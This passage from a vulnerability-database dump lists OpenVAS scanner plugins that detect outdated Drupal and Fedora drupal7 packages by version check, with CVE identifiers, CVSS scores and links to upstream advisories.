isrpmvuln(pkg:\"drupal7\", rpm:\"drupal7~7.16~1.fc16\", rls:\"FC16\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:32:34", "description": "Drupal is prone to a remote code execution vulnerability.", "cvss3": {}, "published": "2018-04-26T00:00:00", "type": "openvas", "title": "Drupal Core Critical Remote Code Execution Vulnerability (SA-CORE-2018-004) (Linux, Version Check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-7600", "CVE-2018-7602"], "modified": "2018-10-22T00:00:00", "id": "OPENVAS:1361412562310141028", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310141028", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_drupal_core_rce_vuln_SA-CORE-2018-004_lin.nasl 12012 2018-10-22 09:20:29Z asteins $\n#\n# Drupal Core Critical Remote Code Execution Vulnerability (SA-CORE-2018-004) (Linux, Version Check)\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2018 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = 'cpe:/a:drupal:drupal';\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.141028\");\n script_version(\"$Revision: 12012 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-22 11:20:29 +0200 (Mon, 22 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2018-04-26 08:47:32 +0700 (Thu, 26 Apr 2018)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_cve_id(\"CVE-2018-7602\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Drupal Core Critical Remote Code Execution Vulnerability (SA-CORE-2018-004) (Linux, Version Check)\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"This script is Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"drupal_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"drupal/installed\", \"Host/runs_unixoide\");\n\n script_tag(name:\"summary\", value:\"Drupal is prone to a remote code execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"A remote code execution vulnerability exists within multiple subsystems of\n Drupal 7.x and 8.x. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which\n could result in the site being compromised. 
This vulnerability is related to SA-CORE-2018-002 (CVE-2018-7600).\");\n\n script_tag(name:\"affected\", value:\"Drupal 7.x and 8.x\");\n\n script_tag(name:\"solution\", value:\"Update to version 7.59, 8.4.8, 8.5.3 or later.\");\n\n script_xref(name:\"URL\", value:\"https://www.drupal.org/sa-core-2018-004\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe: CPE)) {\n exit(0);\n}\n\nif (!infos = get_app_version_and_location(cpe: CPE, port: port, version_regex:\"^[0-9]\\.[0-9.]+\", exit_no_version: TRUE)) {\n exit(0);\n}\n\nversion = infos['version'];\npath = infos['location'];\n\nif (version_in_range(version: version, test_version: \"7.0\", test_version2: \"7.58\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"7.59\", install_path: path);\n security_message(port: port, data: report);\n exit(0);\n}\n\nif (version_in_range(version: version, test_version: \"8.0\", test_version2: \"8.4.7\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"8.4.8\", install_path: path);\n security_message(port: port, data: report);\n exit(0);\n}\n\nif (version_in_range(version: version, test_version: \"8.5\", test_version2: \"8.5.2\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"8.5.3\", install_path: path);\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:32:34", "description": "Drupal is prone to a remote code execution vulnerability.", "cvss3": {}, "published": "2018-04-26T00:00:00", "type": "openvas", "title": "Drupal Core Critical Remote Code Execution Vulnerability (SA-CORE-2018-004) (Windows, Version Check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-7600", "CVE-2018-7602"], "modified": "2018-10-22T00:00:00", "id": "OPENVAS:1361412562310141029", "href": 
"http://plugins.openvas.org/nasl.php?oid=1361412562310141029", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_drupal_core_rce_vuln_SA-CORE-2018-004_win.nasl 12012 2018-10-22 09:20:29Z asteins $\n#\n# Drupal Core Critical Remote Code Execution Vulnerability (SA-CORE-2018-004) (Windows, Version Check)\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2018 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = 'cpe:/a:drupal:drupal';\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.141029\");\n script_version(\"$Revision: 12012 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-22 11:20:29 +0200 (Mon, 22 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2018-04-26 08:47:32 +0700 (Thu, 26 Apr 2018)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_cve_id(\"CVE-2018-7602\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Drupal Core Critical 
Remote Code Execution Vulnerability (SA-CORE-2018-004) (Windows, Version Check)\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"This script is Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"drupal_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"drupal/installed\", \"Host/runs_windows\");\n\n script_tag(name:\"summary\", value:\"Drupal is prone to a remote code execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"A remote code execution vulnerability exists within multiple subsystems of\n Drupal 7.x and 8.x. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which\n could result in the site being compromised. This vulnerability is related to SA-CORE-2018-002 (CVE-2018-7600).\");\n\n script_tag(name:\"affected\", value:\"Drupal 7.x and 8.x\");\n\n script_tag(name:\"solution\", value:\"Update to version 7.59, 8.4.8, 8.5.3 or later.\");\n\n script_xref(name:\"URL\", value:\"https://www.drupal.org/sa-core-2018-004\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe: CPE)) {\n exit(0);\n}\n\nif (!infos = get_app_version_and_location(cpe: CPE, port: port, version_regex:\"^[0-9]\\.[0-9.]+\", exit_no_version: TRUE)) {\n exit(0);\n}\n\nversion = infos['version'];\npath = infos['location'];\n\nif (version_in_range(version: version, test_version: \"7.0\", test_version2: \"7.58\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"7.59\", install_path: path);\n security_message(port: port, data: report);\n exit(0);\n}\n\nif (version_in_range(version: version, test_version: \"8.0\", test_version2: \"8.4.7\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"8.4.8\", install_path: path);\n 
security_message(port: port, data: report);\n exit(0);\n}\n\nif (version_in_range(version: version, test_version: \"8.5\", test_version2: \"8.5.2\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"8.5.3\", install_path: path);\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:32:14", "description": "The remote host is missing an update for\n the ", "cvss3": {}, "published": "2019-05-10T00:00:00", "type": "openvas", "title": "Fedora Update for drupal7 FEDORA-2019-a06dffab1c", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-11358", "CVE-2012-2922"], "modified": "2019-05-14T00:00:00", "id": "OPENVAS:1361412562310876342", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310876342", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.876342\");\n script_version(\"2019-05-14T05:04:40+0000\");\n script_cve_id(\"CVE-2019-11358\", \"CVE-2012-2922\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"2019-05-14 05:04:40 +0000 (Tue, 14 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-05-10 02:11:35 +0000 (Fri, 10 May 2019)\");\n script_name(\"Fedora Update for drupal7 FEDORA-2019-a06dffab1c\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC29\");\n\n script_xref(name:\"FEDORA\", value:\"2019-a06dffab1c\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/QV3PKZC3PQCO3273HAT76PAQZFBEO4KP\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for\n the 'drupal7' package(s) announced via the FEDORA-2019-a06dffab1c advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is\n present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Equipped with a powerful blend of features,\n Drupal is a Content Management System written in PHP that can support a\n variety of websites ranging from personal weblogs to large community-driven\n websites. 
Drupal is highly configurable, skinnable, and secure.\");\n\n script_tag(name:\"affected\", value:\"'drupal7' package(s) on Fedora 29.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"FC29\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"drupal7\", rpm:\"drupal7~7.66~1.fc29\", rls:\"FC29\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:32:15", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2019-05-07T00:00:00", "type": "openvas", "title": "Fedora Update for drupal7 FEDORA-2019-35589cfcb5", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-6341", "CVE-2012-2922"], "modified": "2019-05-14T00:00:00", "id": "OPENVAS:1361412562310876304", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310876304", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.876304\");\n script_version(\"2019-05-14T05:04:40+0000\");\n script_cve_id(\"CVE-2012-2922\", \"CVE-2019-6341\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"2019-05-14 05:04:40 +0000 (Tue, 14 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-05-07 02:43:26 +0000 (Tue, 07 May 2019)\");\n script_name(\"Fedora Update for drupal7 FEDORA-2019-35589cfcb5\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC29\");\n\n script_xref(name:\"FEDORA\", value:\"2019-35589cfcb5\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/P4KTET2PTSIS3ZZ4SGBRQEN6CCLV5SYX\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'drupal7'\n package(s) announced via the FEDORA-2019-35589cfcb5 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Equipped with a powerful blend of features, Drupal is a Content Management\nSystem written in PHP that can support a variety of websites ranging from\npersonal weblogs to large community-driven websites. 
Drupal is highly\nconfigurable, skinnable, and secure.\");\n\n script_tag(name:\"affected\", value:\"'drupal7' package(s) on Fedora 29.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"FC29\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"drupal7\", rpm:\"drupal7~7.65~1.fc29\", rls:\"FC29\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-06-05T01:40:46", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2019-05-26T00:00:00", "type": "openvas", "title": "Fedora Update for drupal7 FEDORA-2019-040857fd75", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-11358", "CVE-2019-11831", "CVE-2012-2922"], "modified": "2019-05-31T00:00:00", "id": "OPENVAS:1361412562310876410", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310876410", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A 
PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.876410\");\n script_version(\"2019-05-31T13:18:49+0000\");\n script_cve_id(\"CVE-2019-11831\", \"CVE-2019-11358\", \"CVE-2012-2922\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-05-31 13:18:49 +0000 (Fri, 31 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-05-26 02:12:06 +0000 (Sun, 26 May 2019)\");\n script_name(\"Fedora Update for drupal7 FEDORA-2019-040857fd75\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC29\");\n\n script_xref(name:\"FEDORA\", value:\"2019-040857fd75\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/E3NUKPG7V4QEM6QXRMHYR4ABFMW5MM2P\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'drupal7'\n package(s) announced via the FEDORA-2019-040857fd75 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Equipped with a powerful blend of features, Drupal is a Content Management\nSystem written in PHP that can support a variety of websites ranging from\npersonal weblogs to large community-driven websites. 
Drupal is highly\nconfigurable, skinnable, and secure.\");\n\n script_tag(name:\"affected\", value:\"'drupal7' package(s) on Fedora 29.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"FC29\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"drupal7\", rpm:\"drupal7~7.67~1.fc29\", rls:\"FC29\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2018-01-18T11:09:19", "description": "Check for the Version of drupal7", "cvss3": {}, "published": "2013-01-08T00:00:00", "type": "openvas", "title": "Fedora Update for drupal7 FEDORA-2012-20766", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-5653", "CVE-2012-5651", "CVE-2012-5652", "CVE-2012-2922"], "modified": "2018-01-18T00:00:00", "id": "OPENVAS:864980", "href": "http://plugins.openvas.org/nasl.php?oid=864980", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for drupal7 FEDORA-2012-20766\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A 
PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\ntag_affected = \"drupal7 on Fedora 17\";\ntag_insight = \"Equipped with a powerful blend of features, Drupal is a Content Management\n System written in PHP that can support a variety of websites ranging from\n personal weblogs to large community-driven websites. Drupal is highly\n configurable, skinnable, and secure.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2013-January/095371.html\");\n script_id(864980);\n script_version(\"$Revision: 8456 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-18 07:58:40 +0100 (Thu, 18 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-01-08 09:59:31 +0530 (Tue, 08 Jan 2013)\");\n script_cve_id(\"CVE-2012-2922\", \"CVE-2012-5651\", \"CVE-2012-5652\", \"CVE-2012-5653\");\n script_tag(name:\"cvss_base\", value:\"6.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:S/C:P/I:P/A:P\");\n script_xref(name: \"FEDORA\", value: \"2012-20766\");\n script_name(\"Fedora Update for drupal7 FEDORA-2012-20766\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of drupal7\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value 
: tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC17\")\n{\n\n if ((res = isrpmvuln(pkg:\"drupal7\", rpm:\"drupal7~7.18~1.fc17\", rls:\"FC17\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 6.0, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-02-05T11:11:25", "description": "Check for the Version of drupal7", "cvss3": {}, "published": "2013-01-08T00:00:00", "type": "openvas", "title": "Fedora Update for drupal7 FEDORA-2012-20794", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-5653", "CVE-2012-5651", "CVE-2012-5652", "CVE-2012-2922"], "modified": "2018-02-03T00:00:00", "id": "OPENVAS:864982", "href": "http://plugins.openvas.org/nasl.php?oid=864982", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for drupal7 FEDORA-2012-20794\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\ntag_affected = \"drupal7 on Fedora 16\";\ntag_insight = \"Equipped with a powerful blend of features, Drupal is a Content Management\n System written in PHP that can support a variety of websites ranging from\n personal weblogs to large community-driven websites. Drupal is highly\n configurable, skinnable, and secure.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2013-January/095372.html\");\n script_id(864982);\n script_version(\"$Revision: 8650 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-02-03 13:16:59 +0100 (Sat, 03 Feb 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-01-08 09:59:59 +0530 (Tue, 08 Jan 2013)\");\n script_cve_id(\"CVE-2012-2922\", \"CVE-2012-5651\", \"CVE-2012-5652\", \"CVE-2012-5653\");\n script_tag(name:\"cvss_base\", value:\"6.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:S/C:P/I:P/A:P\");\n script_xref(name: \"FEDORA\", value: \"2012-20794\");\n script_name(\"Fedora Update for drupal7 FEDORA-2012-20794\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of drupal7\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n 
script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC16\")\n{\n\n if ((res = isrpmvuln(pkg:\"drupal7\", rpm:\"drupal7~7.18~1.fc16\", rls:\"FC16\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 6.0, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:38:05", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2013-01-08T00:00:00", "type": "openvas", "title": "Fedora Update for drupal7 FEDORA-2012-20794", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-5653", "CVE-2012-5651", "CVE-2012-5652", "CVE-2012-2922"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310864982", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310864982", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for drupal7 FEDORA-2012-20794\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2013-January/095372.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.864982\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-01-08 09:59:59 +0530 (Tue, 08 Jan 2013)\");\n script_cve_id(\"CVE-2012-2922\", \"CVE-2012-5651\", \"CVE-2012-5652\", \"CVE-2012-5653\");\n script_tag(name:\"cvss_base\", value:\"6.0\");\n script_tag(name:\"cvss_base_vector\", 